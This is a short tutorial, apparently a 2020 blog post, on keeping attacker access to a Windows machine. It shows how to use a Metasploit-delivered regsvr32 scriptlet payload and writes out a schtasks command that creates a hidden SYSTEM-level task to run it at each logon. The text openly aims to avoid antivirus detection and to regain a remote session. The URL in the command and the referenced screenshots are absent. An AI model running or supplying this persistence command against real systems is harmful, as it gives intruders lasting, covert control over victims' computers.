Schtasks Persistance

    I'll warn you up front, this may or may not work with certain a/v products.  You also don't need to use Metasploit and in fact, you're probably better off if you don't.  The concept is the same though, we're going to schedule a task to run in Windows on login.  What we choose to execute can be anything really and it's probably better if it's something that can avoid detection from a/v. 

    Using the Metasploit method, we setup script delivery:

    There are quite a few targets but I'm using Regsvr32.  When we run, it's a job and therefore will run in the background:

    We take the URL and we add that to our command:

    schtasks /create /tn Persist /TR "regsvr32 /s /n /u /i: scrobj.dll" /SC onlogon /RU System

    When we look in Task Scheduler, we see our newly created task:

    When we logout and back in, we catch our session:

    Pretty simple, and again, we just need to schedule something in order to achieve that persistence on logon.

    © 2020